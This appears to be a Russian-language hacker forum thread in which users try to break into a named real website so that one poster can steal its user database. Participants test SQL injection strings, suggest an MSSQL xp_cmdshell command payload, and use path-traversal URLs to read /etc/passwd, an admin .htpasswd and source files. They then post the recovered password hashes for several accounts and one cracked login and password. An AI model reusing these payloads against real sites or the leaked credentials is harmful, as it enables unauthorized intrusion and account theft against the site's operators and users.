sql inj
 

вот линка _http://gibbon.kinnet.ru/theme.php?theme=2
у меня есть подозрения что там иньекция я много чего пробовал но ни в какую в чем дело помогите пожалста

Хм...теперь вопрос, с чего это у тебя такое подозрение возникло?
На все он отвечает...
Скули не вижу...по крайней мере пока...

ээй люди хелп ми плиззззззз

Нету там инъекции. С чего ты взял, что есть?

An error occured. вот ето почему пишет обьясните ламеру

как мне на этот сервак залезть помогите кто нить кому делать нече репы дам

Упз. Пропустил с первого раза.
http://gibbon.kinnet.ru/theme.php?theme='2'
http://gibbon.kinnet.ru/theme.php?theme=2
Вывод аналогичный, значит инъекция всё-таки есть.

учим английский.
An error occurred = произошла ошибка.
Теперь пораскинь мозгами и подумай, почему это пишет

_http://gibbon.kinnet.ru/theme.php?theme=3-1
_http://gibbon.kinnet.ru/theme.php?theme=2

_http://gibbon.kinnet.ru/theme.php?theme=2--

имхо иньекция есть но вывода нету...

а там ваще че нить есть помогите добры люди

и че в таком случае делать?

ну вобще сюдя по этим 2 запросам
http://gibbon.kinnet.ru/theme.php?theme=2/*
http://gibbon.kinnet.ru/theme.php?theme=2--
там mssql но по всем банерам на портах там стоит nix а на nix мало кто ставит...
если mssql можно попробывать исполнить произольные команды если юзер sa что точно не так... ну и остаеться посимвольный перебор...

даже могу точно сказать та линукс
а поизвольные команды это типа какие

1';exec%20master..xp_cmdshell%20'dir%20c:\'--

это типа чтоль скуль вслепую будет ??? :(

Комментирование -- есть и на мускуле ;)

а как мона через эту хрень кондную строку открыть наприме или бд угнать

скорее всего БД никак не угнать. разве что попробовать посимвольный перебор какого-нить админского пасса , но это большой геморрой :)

перебор пасов сам по себе оч большой геморой
че такой сервак непреступный что ль прямо _www.microsoft.com

че ваще мне та забацать то мона ??

Тебе подсказали.
Читай доки и разбирайся сам за тебя не кто делать нечего не будет.

Незнаю, но это кажеться поинтереснее
_http://gibbon.kinnet.ru/gallerys/gallery.php?dir=

_http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../../../../../../../../etc/passwd%00

Вот вот =)
Ну и если уж идти до конца
_http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../admin/.htpasswd%00

содержит

Ну и если уж идти до конца, то кто-то должен брутить пароли.

[/quote]Ну и если уж идти до конца, то кто-то должен брутить пароли.[quote]
Слудующий пост будет
Ну и если уж идти до конца, то кто-то должен получить рута на хостинге....
мдя ребят совсем обнаглели.

патци это как я понимаю пасы gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92 gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92
всем по +1

login:locky
pass: underwat

2satana8920
это хеши в DES

да я уже понял что это хеши ща как нить расщифруем тока не знаю где джона взять под вынь

satana8920
limpompo за тебя уже все сделал.

login:locky
pass: underwat

Тебе одного не хватит?

http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../index.php%00

хы )
http://webcam.kinnet.ru/

понимаешь в чем дело друг мой мне нужна ВСЯ бд юзарей на этом сервере вот я че и парюсь

Warning: pg_exec() query failed: ERROR: Unterminated quoted string in /home/httpd/html/forum/forum.php3 on line 488

Warning: pg_numrows(): supplied argument is not a valid PostgreSQL result resource in /home/httpd/html/forum/forum.php3 on line

из-за бажного поиска форума - абсолютный путь его.... инклудимс )
http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../../httpd/html/forum/forum.php3%00

так мне БД нужна куда мне админки

ну мона впринципе на сервак че нить залить ибудет мне доступ ко всему через какой нить скрипт баговы
мона веть так чделать?

обижаешь! подумай хорошенько - чем больше зацепок, тем больше шанс.
и если ты знаеш, что тебе нужно и указываешь другим, что им не нужно делать, так может быть сам сделаешь?

да ладно я молчу :Х

а смысл вот этого инклуда чего он нам дает то ??

Наверное фсетаки офтоп, но судя по новостям на _http://gibbon.kinnet.ru, уже даже найденные дырочки вскоре прикроют. Зря наверно подобранные пароли выложили..
Хотя конечно как показывает практика, (_4919.fatal.ru) админ может на сайт не заглядывать месяцами.